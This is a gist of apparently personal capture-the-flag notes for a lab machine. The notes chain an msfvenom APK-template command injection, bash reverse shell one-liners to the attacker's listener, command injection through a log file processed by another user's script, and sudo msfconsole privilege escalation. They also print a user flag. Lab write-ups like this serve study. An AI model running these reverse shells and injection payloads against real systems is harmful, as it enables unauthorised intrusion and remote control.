Skip to content

Instantly share code, notes, and snippets.

Created Aug 13, 2021
What would you like to do?

Nmap scan

22/ssh 5000/http ![[Pasted image 20210416211309.png]]

Visiting ![[Pasted image 20210416211429.png]]

File upload in "Template file" ==> Command injection in msfvenom ==> RCE

This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x


nc -nvlp 1337
payload = 'bash -c "/bin/bash -i >& /dev/tcp/ 0>&1"'

Got foothold (USER)

![[Pasted image 20210416211608.png]]

user flag: c3728a7c05e95bb566784da579a2c887

Second user



cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

POC (touch a file on /home/pwn/)

vim /home/kid/hacker
	t t; touch hhh.txt;
insert ";" into searchsploit user input
t t;bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'; >> hacker

![[Pasted image 20210416235654.png]]


![[Pasted image 20210416235635.png]]

Ease priv esc metasploit's msfconsole allows you to execute system commands within the msfconsole sudo /opt/metasploit-framework-6.0.9/msfconsole

![[Pasted image 20210416235933.png]]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment